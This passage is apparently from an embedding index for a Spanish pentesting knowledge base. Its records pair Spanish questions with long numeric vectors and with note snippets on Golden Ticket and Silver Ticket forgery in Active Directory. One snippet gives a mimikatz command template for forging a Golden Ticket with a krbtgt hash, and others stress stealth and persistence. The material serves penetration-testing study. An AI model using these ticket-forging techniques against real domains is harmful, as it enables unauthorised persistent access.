0.01243, -0.04761, 0.00478, -0.02355, -0.08413, -0.01847, 0.0291, 0.13363, 0.02121, -0.0512, 0.02354, 0.07918, 0.01389, -0.05662, -0.04147, 0.06068, 0.03453, 0.13968, 0.00247, 0.00085, 0.04054, 0.03939, -0.05085, -0.01527, -0.03265, 0.03029, -0.00376, -0.02733, -0.03314, 0.04727, -0.05847, -0.06231, -0.03365, -0.03672, -0.04133, 0.07229, -0.03063, 0.01783, -0.05299, 0.03648, -0.06911, -0.02483, 0.0246, -0.03243, 0.0315, 0.00891, -0.00742, 0.07865, 0.01049, -0.01034, 0.02886, -0.01735, -0.01565, 0.0227, -0.01529, -0.06888, -0.0121, -0.04379, 0.03833, 0.0335, 0.03272, -0.01981, 0.09561, 0.04211, 0.04444, 0.03206, 0.03597, 0.00388, -0.02053, 0.05675, 0.03101, -0.04941, 0.01013, 0.02542, -0.01829, 0.00892, 0.00356, 0.02167, -0.03022, -0.02468, 0.01279, 0.10258, -0.03363, -0.0349, -0.01748, 0.00308, 0.06752, -0.04067, 0.08124, -0.10694, -0.04168, -0.02861, 0.02942, -0.00443, -0.04687, -0.01258, 0.06932, 0.01898, 0.02524, 0.04853, 0.00964, 0.00785, -0.04013, 0.00134, 0.0326, 0.00593, -0.04734, -0.03413, 0.04468, -0.01011, 0.01223, 0.02426, 0.01109, 0.01024, -0.08185, -0.02913, 0.00175, -0.02261, -0.00438, -0.01701, -0.02158, -0.03964, -0.05431, -0.00222, -0.01479, -0.0137, 0.0106, 0.02336, -0.00596, -0.00545, 0.00594, -0.00772]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "existe alguna alternativa libre o legal al programa Mimikatz?", "v": [-0.1631, 0.1396, -0.07546, 0.03005, -0.05854, -0.04014, -0.13783, -0.01614, -0.32342, -0.11438, 0.06682, -0.16445, 0.0878, 0.05346, 0.1655, -0.05817, 0.09206, -0.08391, 0.13635, -0.08858, -0.00523, -0.01089, -0.04361, -0.08528, -0.0157, -0.0822, 0.10156, -0.03998, 0.01559, 0.00162, 0.05171, 0.01353, -0.00664, -0.04932, 0.0135, 0.05368, 0.18107, -0.01428, 0.10827, -0.04505, 0.06164, -0.04338, 0.02689, 0.11769, 0.00662, -0.00778, -0.04955, 0.0018, 0.03406, -0.00049, -0.01714, -0.00613, -0.02136, 0.01456, 0.09116, -0.0435, -0.06509, -0.1073, -0.17061, 0.02356, -0.04499, -0.05103, 0.06957, -0.0428, 0.06678, 0.09428, 0.02, 0.04446, -0.03502, 0.11363, 0.06025, -0.01796, 0.05716, -0.09542, -0.11267, 0.00848, -0.0774, -0.07805, 0.02031, 0.0264, -0.04079, 0.02784, 0.03019, 0.12223, -0.0356, -0.04692, 0.01794, -0.09999, -0.04514, 0.04478, -0.00787, 0.12949, 0.04928, 0.07598, -0.05233, -0.08187, 0.02634, 0.0595, 0.00915, 0.12632, 0.03605, 0.04767, -0.12811, -0.02782, 0.00487, -0.01928, 0.02266, -0.02144, -0.03947, 0.10023, -0.03114, 0.0476, -0.05187, -0.01228, -0.07825, -0.02432, -0.02984, 0.04038, 0.02578, -0.03313, 0.01237, 0.03216, -0.02881, -0.02357, 0.03692, -0.04785, -0.0102, 0.1416, -0.1034, 0.0683, 0.05267, -0.05532, -0.0008, -0.11102, -0.0622, -0.11851, 0.07896, 0.01019, 0.04876, -0.01363, -0.01334, -0.03288, -0.01321, -0.00022, -0.00503, -0.02919, -0.05986, -0.02707, 0.05384, -0.0493, -0.08544, 0.02992, 0.00357, 0.1073, -0.03491, 0.07885, 0.02269, 0.00076, -0.07642, 0.05319, 0.02107, -0.05977, -0.06994, -0.03668, 0.02898, 0.0426, 0.06253, -0.00932, -0.0194, 0.05965, 0.0052, 0.10777, 0.09485, -0.06929, 0.01841, -0.04735, -0.01164, -0.07539, 0.05355, -0.06906, -0.0115, 0.07075, 0.03668, -0.00872, -0.01068, -0.02083, -0.02365, 0.11481, 0.01515, -0.00271, -0.0195, -0.05535, -0.05927, -0.05751, -0.02427, 0.05288, 0.02286, -0.05675, 0.00871, -0.0246, -0.07077, -0.03366, 0.00793, -0.00931, 0.01442, 0.03552, 0.01341, 0.00664, 0.05526, 0.03859, 0.01878, 0.0016, 0.04555, 0.05848, -0.02903, -0.01113, -0.01947, 0.00576, 0.06816, -0.01608, -0.00747, 0.0098, -0.00736, 0.09757, 0.01379, -0.01088, 0.0119, 0.02745, -0.02215, 0.02479, -0.00175, -0.03904, 0.05617, 0.02354, -0.00923, -0.04704, -0.01721, 0.01663, 0.00913, 0.00557, -0.00092, 0.05111, 0.02872, -0.03254, 0.01052, 0.05176, -0.04512, -0.00581, -0.03245, 0.00353, -0.02647, 0.04117, 0.02904, -0.0181, 0.05018, 0.05735]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "que programa me permite firmar todos los TGT de Kerberos para obtener persistencia total?", "v": [-0.07184, 0.00643, -0.09137, -0.07304, 0.23953, -0.12136, -0.04973, 0.08927, -0.07507, -0.05505, -0.13209, 0.11585, 0.183, -0.14032, 0.07793, 0.0737, -0.06277, -0.06741, 0.11445, 0.13446, 0.21014, 0.08372, 0.05593, -0.1755, -0.0177, -0.09914, 0.00228, -0.16137, -0.01138, 0.00584, 0.07284, -0.05028, -0.03929, -0.09934, 0.07006, -0.00262, -0.09329, 0.11521, 0.03667, 0.09255, 0.05309, 0.0568, 0.15619, 0.06342, 0.0076, 0.01536, 0.02246, 0.02589, 0.07612, -0.00548, -0.01168, 0.02483, -0.06161, -0.02719, -0.10872, -0.07341, 0.08233, -0.06055, -0.1439, 0.00032, -0.00396, -0.11369, -0.0825, -0.00333, 0.08196, -0.11885, 0.06528, 0.01027, -0.03955, 0.05292, -0.08342, 0.04212, 0.00742, -0.02118, -0.00994, 0.02274, -0.09444, -0.07409, 0.02431, 0.04127, -0.07292, 0.05437, 0.00757, 0.0831, 0.04579, -0.04985, -0.02116, -0.09794, -0.01196, -0.02128, 0.03824, -0.01111, 0.01493, 0.00645, -0.01306, -0.09365, 0.07712, 0.04604, -0.00188, 0.05622, 0.02016, -0.05254, -0.07791, -0.03938, -0.04609, -0.05526, -0.00227, -0.01562, -0.07339, 0.07439, 0.01736, 0.04799, -0.01267, 0.00459, -0.07333, 0.03672, -0.01462, -0.05293, 0.09357, -0.02244, -0.02416, 0.1269, -0.08797, 0.01632, 0.11902, -0.01251, -0.02627, 0.0739, -0.1103, 0.08049, 0.0312, 0.10688, -0.05535, -0.09053, -0.03108, -0.03057, -0.04766, 0.04378, -0.0324, 0.00658, 0.046, 0.02897, -0.01502, 0.05466, 0.0401, -0.02296, -0.02747, -0.00486, -0.00237, 0.01672, -0.01001, 0.04644, -0.00532, 0.02156, -0.01791, -0.03979, 0.04669, -0.05753, -0.03786, 0.06066, -0.00454, -0.075, -0.06298, -0.06848, 0.00741, -0.06395, -0.04005, 0.02245, 0.02353, 0.07193, -0.00446, 0.03778, -0.00255, 0.00704, 0.00624, -0.03455, 0.04963, -0.03061, -0.01803, -0.01161, -0.07254, 0.02115, 0.05335, 0.0278, 0.04353, 0.03075, -0.00586, 0.03207, 0.05433, -0.03576, 0.05284, 0.063, -0.04882, 0.00909, -0.04927, 0.02546, -0.02596, -0.04717, 0.07447, -0.04798, -0.10838, -0.00588, 0.00111, -0.05735, 0.0181, 0.10825, -0.0453, 0.02813, 0.02335, 0.03251, 0.07048, -0.03705, 0.04358, -0.02366, -0.00833, 0.02706, -0.02018, 0.01865, 0.08328, 0.00576, 0.01904, -0.04572, 0.04256, 0.0806, 0.00326, -0.11035, 0.08768, 0.01631, -0.01384, 0.0257, 0.02351, -0.05187, 0.00247, -0.06669, -0.01553, -0.01304, -0.00753, 0.04166, -0.0226, -0.0655, -0.01033, 0.0636, -0.01408, 0.00409, -0.02293, -0.04058, -0.03228, 0.01949, 0.00183, -0.01304, -0.02674, 0.05763, 0.02957, -0.02438, 0.05204, -0.01221]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con que herramienta puedo generar un ticket vΓ‘lido a voluntad controlando el hash?", "v": [-0.07409, 0.05748, -0.20441, -0.1637, -0.00616, -0.04872, -0.11196, 0.08142, 0.05074, -0.04683, -0.03484, -0.00678, 0.02876, 0.05098, 0.03261, 0.155, 0.10984, -0.14056, -0.0395, 0.09715, 0.00025, -0.06106, -0.06013, -0.07843, -0.03723, -0.01788, -0.00322, 0.06706, -0.22914, 0.03774, -0.01755, -0.06847, -0.00275, -0.09347, -0.04533, 0.03246, -0.03492, 0.25085, 0.08795, 0.03323, -0.07671, 0.06328, -0.09953, 0.11769, -0.02606, -0.06055, -0.02299, 0.06341, -0.05033, -0.0237, 0.04456, -0.14087, -0.17988, 0.04755, 0.04833, -0.0972, 0.14433, -0.07161, -0.05434, -0.12505, -0.12085, -0.03786, -0.0062, 0.08696, -0.08912, 0.04991, 0.04768, -0.0152, -0.06685, 0.05821, -0.17045, 0.02061, 0.02628, 0.04153, 0.00156, 0.00654, 0.05744, 0.03471, 0.07575, -0.01243, 0.00947, -0.05799, -0.08162, -0.05321, 0.0454, -0.06926, 0.06141, -0.10697, 0.025, 0.00856, -0.02152, 0.07532, 0.11914, 0.01083, -0.00516, -0.08246, -0.02528, -0.03648, -0.05404, -0.00817, 0.04025, -0.05189, -0.08779, 0.05277, 0.08176, 0.04217, 0.05207, 0.04989, -0.01847, 0.09878, 0.00499, -0.00733, -0.00304, 0.06613, 0.01568, 0.06341, -0.00485, 0.00216, 0.02069, -0.01754, 0.01895, 0.07498, 0.00082, -0.07929, 0.09783, -0.00268, -0.0433, 0.13219, 0.06119, -0.07992, 0.06035, 0.01967, -0.07904, -0.00758, -0.03252, -0.0367, 0.0176, -0.08738, 0.03345, 0.04021, -0.01369, 0.05923, -0.01587, -0.0943, 0.04864, -0.04952, -0.09498, -0.03372, -0.04341, -0.01195, 0.02321, -0.05416, 0.02034, 0.07923, -0.0371, 0.09795, -0.05084, -0.03503, -0.08433, 0.03016, -0.06953, -0.04007, -0.03604, 0.07978, 0.05259, -0.02072, -0.07169, -0.00487, 0.00606, 0.08501, -0.00976, -0.02411, 0.08859, 0.004, 0.04096, -0.092, -0.07447, -0.02029, -0.00015, -0.1109, 0.03978, -0.03557, -0.02307, -0.03273, -0.03187, -0.01669, 0.02134, 0.02101, 0.0736, 0.03797, 0.01508, 0.04698, 0.03315, -0.04135, -0.00589, 0.03505, 0.00578, -0.01886, 0.01604, -0.0076, -0.02694, 0.00803, 0.0429, -0.03302, 0.0318, 0.01997, -0.04611, -0.02112, 0.03376, 0.03216, 0.03483, 0.00949, 0.05202, -0.02384, -0.0575, -0.0167, -0.02027, -0.00535, 0.02793, -0.02343, 0.05835, -0.00754, 0.06038, -0.02247, 0.00799, -0.03605, 0.01195, 0.05644, 0.05213, 0.04534, 0.02136, -0.03948, 0.01241, -0.00732, 0.05136, -0.03831, 0.06384, -0.0206, -0.09099, -0.01079, -0.01281, 0.04389, 0.00023, -0.022, -0.06342, -0.04532, -0.03109, -0.005, -0.01066, -0.02737, -0.00457, 0.02623, 0.01419, -0.03881, -0.02221, -0.06765]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "cual es una alternativa libre para realizar ataques tipo pass-the-hash sobre todos los tickets Kerberos?", "v": [-0.09981, -0.06175, -0.14248, -0.01858, -0.10257, -0.14942, 0.00787, 0.10314, -0.03866, 0.03067, -0.05972, -0.12562, -0.01381, 0.04729, 0.22055, -0.03361, 0.02753, -0.00329, 0.22399, -0.00245, -0.0338, 0.07753, -0.07681, -0.01123, -0.08502, -0.06369, -0.03309, 0.07183, -0.19647, -0.03899, -0.02127, -0.0597, -0.02943, 0.01249, 0.03111, 0.04984, 0.04613, 0.20893, 0.12481, 0.0294, 0.00522, 0.02693, -0.11801, 0.09404, 0.02485, -0.163, -0.06093, 0.09189, 0.04543, -0.06169, 0.09581, 0.02659, -0.20625, 0.00722, 0.023, -0.16384, 0.05526, -0.10048, -0.10194, -0.01732, -0.11146, 0.02682, -0.01075, -0.02939, 0.03706, -0.08359, 0.00393, -0.03362, -0.04889, 0.04354, -0.01501, 0.02309, 0.0553, 0.11299, -0.02917, 0.07825, 0.03033, 0.03079, 0.03522, 0.06068, 0.05003, -0.02248, 0.00904, 0.02507, -0.06986, -0.0624, 0.0715, -0.11034, -0.03365, 0.08665, 0.08563, 0.04346, 0.06986, 0.02576, -0.08739, -0.10574, -0.09658, -0.00585, -0.06684, -0.04305, -0.0581, -0.02448, -0.07898, 0.05041, -0.04558, 0.01255, -0.01055, 0.05603, -0.01438, -0.03856, -0.0047, 0.016, -0.02092, -0.03306, 0.02597, -0.02607, -0.03474, 0.06027, 0.05405, 0.05864, -0.0701, 0.01659, -0.01654, -0.1029, 0.04859, 0.03333, 0.03171, 0.03883, -0.07631, -0.01315, 0.04763, 0.06604, -0.06261, -0.03076, -0.07407, 0.01514, 0.01816, -0.07377, 0.00061, 0.01229, 0.04901, 0.10921, -0.00215, 0.03297, 0.06215, 0.00193, -0.03342, -0.00941, -0.05019, -0.03707, -0.0213, 0.01564, 0.01419, 0.10368, -0.03435, 0.03614, -0.04488, -0.08841, -0.07326, 0.16025, -0.0296, 0.0002, -0.02938, 0.03297, -0.0043, -0.00214, -0.02089, -0.03703, -0.01272, 0.04266, 0.02463, 0.06141, 0.09169, -0.03823, 0.04156, -0.07682, -0.00803, -0.07503, 0.02261, -0.07576, 0.05603, -0.0754, -0.05427, 0.01364, -0.02981, -0.07702, 0.1006, 0.00422, 0.07306, 0.03034, 0.02053, -0.0044, -0.06239, 0.00782, -0.03612, -0.01122, -0.03811, -0.07701, -0.02219, -0.01201, -0.0456, -0.00373, -0.0063, -0.04328, 0.04984, 0.04485, -0.02523, -0.03917, 0.00306, 0.05907, 0.07248, -0.02168, 0.10652, -0.02626, -0.05467, 0.00761, 0.04846, -0.04259, -0.01706, -0.02763, 0.05379, 0.04122, 0.02256, 0.00247, 0.00024, 0.00286, 0.00529, -0.01582, 0.01309, 0.02468, 0.02435, -0.00238, 0.02319, 0.03309, 0.01846, -0.00798, 0.00128, 0.0227, -0.06214, -0.01729, 0.0513, 0.02889, 0.02718, 0.00807, -0.04282, -0.00493, -0.12433, -0.01462, -0.01243, -0.03365, -0.02264, 0.02635, -0.00965, 0.05447, 0.02313, -0.03562]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "que herramienta sirve para forjar un Silver Ticket sin hablar con el DC?", "v": [-0.15682, -0.01113, -0.16957, -0.18943, -0.10757, -0.20424, -0.14183, 0.01301, 0.1115, 0.0665, 0.00512, -0.16833, -0.05665, -0.1971, 0.01793, 0.0392, 0.10341, -0.09936, 0.0504, -0.06304, 0.13116, 0.09275, -0.01712, -0.17485, -0.02507, -0.02233, 0.061, 0.03325, -0.18114, 0.14804, 0.05374, -0.02394, 0.12622, -0.119, 0.05042, -0.05198, -0.03716, 0.09602, 0.00962, 0.0013, 0.01114, 0.08031, -0.0396, 0.12778, -0.01733, 0.01512, 0.00115, -0.0283, -0.03022, 0.03341, -0.06951, -0.06625, -0.10697, 0.07201, -0.0772, -0.05119, -0.01767, 0.01367, 0.08665, -0.12803, -0.10609, -0.02661, -0.07802, -0.03744, -0.00813, 0.04125, -0.06767, -0.01477, -0.01837, 0.03868, -0.05335, 0.05172, 0.05844, 0.00881, 0.0563, -0.06337, 0.02619, -0.00363, 0.07533, 0.05191, 0.07949, 0.02723, -0.03632, 0.07034, -0.00033, 0.02393, 0.16806, -0.05392, -0.03061, -0.00076, -0.05868, 0.07155, 0.03328, -0.05029, 0.06992, -0.11343, 0.00124, -0.01516, -0.05067, -0.02464, 0.13805, -0.05947, -0.02115, -0.0115, -0.05489, -0.00585, 0.09982, -0.08085, -0.06161, 0.03564, 0.01731, 0.09413, -0.00222, -0.01529, -0.00555, 0.0657, 0.03807, -0.02808, -0.00097, 0.00115, 0.07643, 0.00484, -0.04667, -0.12521, 0.00232, 0.05191, -0.05629, 0.00842, 0.05652, -0.05672, 0.02483, -0.02912, 0.00041, 0.00822, 0.01072, -0.0143, 0.02807, -0.05655, -0.01168, 0.03913, 0.07277, 0.05046, -0.0027, -0.08356, 0.05287, -0.0112, 0.04896, 0.0177, -0.01177, -0.01365, 0.08318, -0.07285, 0.0315, 0.08658, -0.05308, -0.05199, -0.00679, 0.02428, -0.0721, 0.07006, -0.06528, -0.01575, 0.03154, -0.01515, 0.01608, -0.03338, -0.05101, -0.00746, 0.06851, 0.07595, 0.06014, -0.01977, 0.11752, -0.00621, -0.0358, -0.01849, -0.02656, -0.02525, 0.03834, -0.13853, 0.03995, -0.0263, -0.06497, -0.04031, -0.0167, -0.00162, 0.04004, -0.08015, -0.00336, -0.03408, -0.04238, -0.00124, 0.05646, -0.0484, 0.0112, -0.04024, -0.0194, -0.08203, 0.02922, -0.05332, -0.05416, 0.01399, -0.00117, 0.03232, 0.06099, 0.05375, 0.01825, -0.00966, 0.00707, 0.05897, 0.06605, 0.02836, 0.04621, -0.02259, 0.00333, -0.02777, -0.03197, 0.04236, -0.02542, 0.06946, 0.05796, -0.01924, 0.02675, -0.02679, 0.01642, -0.0044, -0.02715, -0.0236, 0.03295, 0.02205, 0.06904, -0.01904, 0.00782, 0.05536, 0.01936, -0.05136, 0.04164, -0.03302, -0.08318, -0.00647, -0.00865, 0.0518, -0.00351, 0.02304, -0.00983, -0.01078, 0.01985, 0.0001, 0.00879, -0.05796, -0.00125, 0.01735, 0.03681, -0.00913, -0.02223, 0.00266]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "con quΓ© puedo crear un TGS usando el hash NTLM de una cuenta de servicio especΓ­fica?", "v": [-0.16331, -0.00229, -0.12906, 0.02183, 0.08352, -0.08025, -0.17607, 0.07699, -0.01996, 0.11786, -0.19913, 0.04581, 0.05823, 0.04722, -0.01058, 0.03602, 0.03642, -0.1735, 0.04263, 0.10891, -0.05174, -0.08637, -0.10369, -0.09937, -0.02169, -0.08986, 0.02396, -0.13674, -0.16554, 0.11176, -0.05583, -0.04966, -0.14222, -0.0313, -0.03636, -0.01355, -0.00789, 0.12492, 0.04051, 0.0933, 0.06881, 0.07683, -0.07243, 0.18345, 0.1086, -0.07895, 0.01449, -0.03949, -0.01114, -0.09087, -0.02749, 0.03834, -0.20758, -0.09193, -0.06326, -0.03336, 0.08824, -0.04935, -0.09951, 0.03842, -0.04624, -0.02862, 0.01159, -0.06132, -0.02881, -0.1536, 0.00205, -0.00309, -0.03781, -0.00603, -0.15895, 0.02693, 0.04865, -0.10767, 0.06722, 0.07657, -0.03453, -0.00396, 0.03937, 0.01271, 0.05655, -0.07025, -0.06288, -0.0336, -0.09262, -0.02455, -0.03273, -0.02125, 0.03857, -0.01744, 0.0454, 0.08139, -0.04217, 0.02563, 0.0374, -0.01531, 0.06859, -0.01497, 0.02492, 0.00148, 0.08067, -0.03665, -0.01733, 0.16097, -0.08994, -0.0045, 0.09065, -0.05372, -0.00608, 0.01586, 0.10426, -0.04576, -0.06002, -0.0415, -0.01772, -0.01243, -0.03161, -0.02178, 0.00614, 0.03218, -0.0314, -0.03298, 0.09939, 0.04548, 0.04344, -0.02179, -0.09061, 0.08569, -0.07865, 0.01863, 0.01628, 0.0126, -0.11826, -0.0293, 0.02332, -0.01361, -0.00839, -0.04249, -0.01352, -0.0383, 0.07646, 0.06529, -0.01449, -0.02441, 0.07876, 0.00998, -0.00574, -0.10068, -0.03648, 0.02501, 0.08479, -0.03327, 0.00102, -0.0196, -0.09448, 0.00112, -0.02956, -0.07575, -0.06381, 0.07234, -0.00308, 0.04714, -0.00464, 0.04242, -0.00241, -0.05496, -0.00774, -0.0259, 0.07352, -0.01316, -0.06547, -0.00899, 0.00143, -0.07717, 0.04427, -0.06029, -0.03537, -0.05357, -0.03172, -0.07506, -0.04122, -0.01911, -0.04222, -0.04683, -0.03473, -0.05711, -0.00217, -0.00105, -0.00268, 0.00734, -0.05013, 0.06445, -0.02242, -0.02228, -0.01133, -0.04803, 0.04188, -0.05314, 0.01836, -0.05259, -0.04788, 0.0225, 0.0102, -0.05112, 0.02479, 0.01298, -0.06137, 0.10496, -0.0224, 0.0102, 0.0517, -0.02835, 0.08133, -0.01971, -0.05566, 0.05713, 0.03628, -0.02327, 0.01589, 0.01369, -0.02707, -0.02253, 0.02136, 0.02384, -0.00983, -0.04427, 0.05139, 0.0144, 0.01763, 0.0499, -0.00078, 0.03202, -0.01735, -0.03355, 0.02089, 0.0294, 0.02393, 0.00836, -0.05626, -0.02603, 0.05002, 0.08972, -0.05151, -0.01117, 0.01361, -0.02802, -0.08537, 0.05057, -0.05179, -0.06461, 0.00793, 0.02315, 0.04289, -0.00289, -0.00404, 0.00451]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "como montas un ataque Silver Ticket de forma mΓ‘s sigilosa que un Golden Ticket?", "v": [-0.05088, -0.16639, -0.02931, -0.04907, -0.18087, -0.04451, -0.17071, -0.07523, 0.02006, 0.09381, -0.00707, -0.01268, 0.02923, 0.04721, 0.12167, -0.03923, 0.05733, -0.09093, 0.1224, -0.03283, 0.04852, 0.10632, 0.13829, -0.22721, 0.11657, -0.00806, 0.15271, 0.10263, -0.03359, -0.01177, 0.09084, -0.10267, -0.01996, -0.0813, 0.04819, -0.10931, -0.05603, 0.07738, 0.06249, -0.05931, -0.01212, 0.0213, 0.01138, 0.04276, 0.02977, -0.1294, 0.02695, 0.10651, -0.01783, -0.01428, 0.04523, 0.01651, -0.09301, -0.04438, -0.01876, -0.09694, -0.05343, -0.07563, 0.02987, 0.05521, -0.06087, -0.05486, -0.04327, 0.07015, -0.10738, 0.11035, -0.00996, -0.00368, 0.0368, -0.12069, -0.03323, -0.00049, -0.06005, 0.15277, 0.10406, -0.09373, 0.12535, 0.02054, -0.02463, 0.09436, 0.01245, 0.0261, -0.04551, 0.03464, -0.01322, -0.00638, 0.0557, -0.06918, -0.13173, 0.005, -0.02773, -0.00226, 0.05129, -0.01531, -0.05784, -0.09503, -0.11985, -0.04415, -0.05363, 0.05019, -0.01615, -0.04854, 0.0012, 0.00803, -0.02381, 0.0868, -0.01298, -0.10639, 0.00125, -0.07098, -0.0936, 0.01614, -0.09603, -0.01009, 0.05448, 0.00152, 0.1071, 0.04167, 0.08699, -0.02484, 0.00829, -0.04798, -0.04431, -0.02964, -0.00521, 0.01789, -0.03589, -0.05083, -0.01566, -0.01136, -0.07083, 0.07792, 0.02477, 0.05327, 0.01018, 0.03415, -0.0375, -0.08281, 0.01941, 0.05851, 0.07705, 0.00487, 0.03561, -0.00554, 0.06587, -0.05678, -0.05053, 0.03106, -0.06854, 0.01137, -0.04427, 0.00075, -0.06861, 0.10181, -0.08964, -0.02506, -0.04664, -0.02662, -0.04014, 0.10139, -0.03662, 0.05689, -0.02919, 0.04888, 0.01321, -9e-05, -0.01521, -0.03616, 0.01234, -0.00265, 0.0415, -0.00636, 0.02716, 0.0398, 0.00237, -0.08657, -0.02799, -0.04117, 0.09636, -0.0413, 0.10982, -0.04081, -0.02923, 0.07255, -0.04263, 0.00705, 0.10442, -0.05067, 0.00589, 0.02715, 0.0054, -0.007, 0.0321, 0.07802, -0.01, -0.0965, -0.03387, -0.01553, -0.00692, -0.04859, -0.04297, -0.0315, -0.02185, 0.00577, 0.09045, 0.02445, -0.04729, 0.00048, -0.04112, 0.09559, 0.05425, -0.01683, 0.11405, -0.09577, 0.0106, 0.00117, 0.00064, -0.00642, -0.03944, 0.02482, 0.04044, 0.02786, 0.02654, 0.01106, 0.00674, -0.06924, -0.01983, 0.01173, 0.06645, 0.04881, 0.05918, -0.05224, 0.00616, 0.04606, 0.09548, 0.00718, 0.02937, -0.03816, -0.10075, 0.04788, -0.00325, 0.04728, 0.00126, 0.04717, 0.01125, -0.03581, -0.04642, 0.09471, 0.05075, -0.05188, 0.01356, 0.01878, 0.00049, -0.05387, -0.00485, -0.00497]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "con quΓ© herramienta puedo robar tickets para acceder solo a un servidor especΓ­fico sin tocar la KDC?", "v": [-0.1013, -0.04219, -0.20192, -0.12594, -0.04756, -0.14202, 0.1033, 0.15379, 0.03112, 0.01506, -0.08706, -0.14681, 0.04721, -0.13219, 0.11905, -0.00878, 0.12584, -0.05952, 0.04132, 0.06577, 0.0562, -0.03014, 0.05453, 0.01429, 0.04202, -0.06794, 0.07388, 0.01071, -0.19913, -0.00439, 0.01345, -0.09225, 0.07092, -0.06299, 0.01058, -0.12699, 0.08219, 0.08801, 0.01929, 0.01524, 0.03576, 0.02656, -0.12699, -0.0024, 0.06405, -0.03833, 0.01972, 0.02722, 0.05272, 0.07321, -0.01351, -0.07647, -0.16307, -0.05425, -0.07516, -0.05972, 0.16114, -0.05028, 0.13422, -0.00811, -0.14268, 0.0487, -0.11739, -0.04095, 0.0739, 0.01404, 0.03761, -0.05395, -0.02242, 0.00012, -0.14504, 0.03369, 0.08325, 0.02653, 0.08213, 0.0636, 0.05225, -0.00273, 0.07365, 0.01471, 0.00425, 0.05198, -0.08237, 0.05332, -0.07776, -0.04414, 0.17598, -0.04343, -0.01178, -0.00639, 0.07835, 0.08532, -0.08417, 0.05169, 0.01845, -0.10196, 0.09115, -0.0379, -0.08296, -0.04653, 0.09757, -0.03609, -0.1109, 0.07501, -0.07271, 0.04086, 0.04775, -0.04906, -0.021, -0.04031, -0.03164, 0.01475, -0.05533, 0.03291, 0.00903, 0.02405, -0.016, -0.05835, -0.02603, -0.01454, 0.00422, -0.0464, 0.00491, -0.11289, 0.05564, -0.05304, 0.00811, 0.08429, -0.01385, -0.10645, 0.04818, -0.01678, -0.03409, 0.02732, -0.00768, -0.02191, 0.02784, -0.12375, -0.05276, 0.01831, 0.0347, 0.02405, -0.01493, -0.01146, 0.11725, 0.00358, 0.05795, -0.04241, -0.08561, -0.02022, 0.02831, -0.07705, -0.04003, 0.00839, -0.06357, 0.04253, 0.01228, -0.03737, -0.12566, 0.02537, -0.05099, 0.03419, -0.0226, 0.00838, -0.02163, -0.01299, -0.01444, 0.0045, 0.07968, 0.07928, -0.02952, 0.04174, 0.10042, -0.00805, -0.02418, -0.07271, -0.05089, -0.07749, 0.05031, -0.04849, -0.02404, 0.02808, 0.01893, -0.03713, -0.04629, -0.03977, 0.03991, -0.06551, 0.01841, 0.04597, 0.03273, 0.00679, -0.02746, 0.0015, 0.0471, -0.05249, -0.04955, -0.00923, -0.03984, -0.0007, -0.0297, -0.01617, -0.01517, -0.0488, 0.13336, 0.01228, -0.00063, 0.00369, -0.01902, 0.04343, 0.04045, -0.00659, 0.05877, -0.05014, 0.01571, 0.02716, 0.00012, 0.02777, -0.0299, -0.00866, -0.00322, 0.03688, 0.09264, -0.03194, 0.00107, 0.0172, 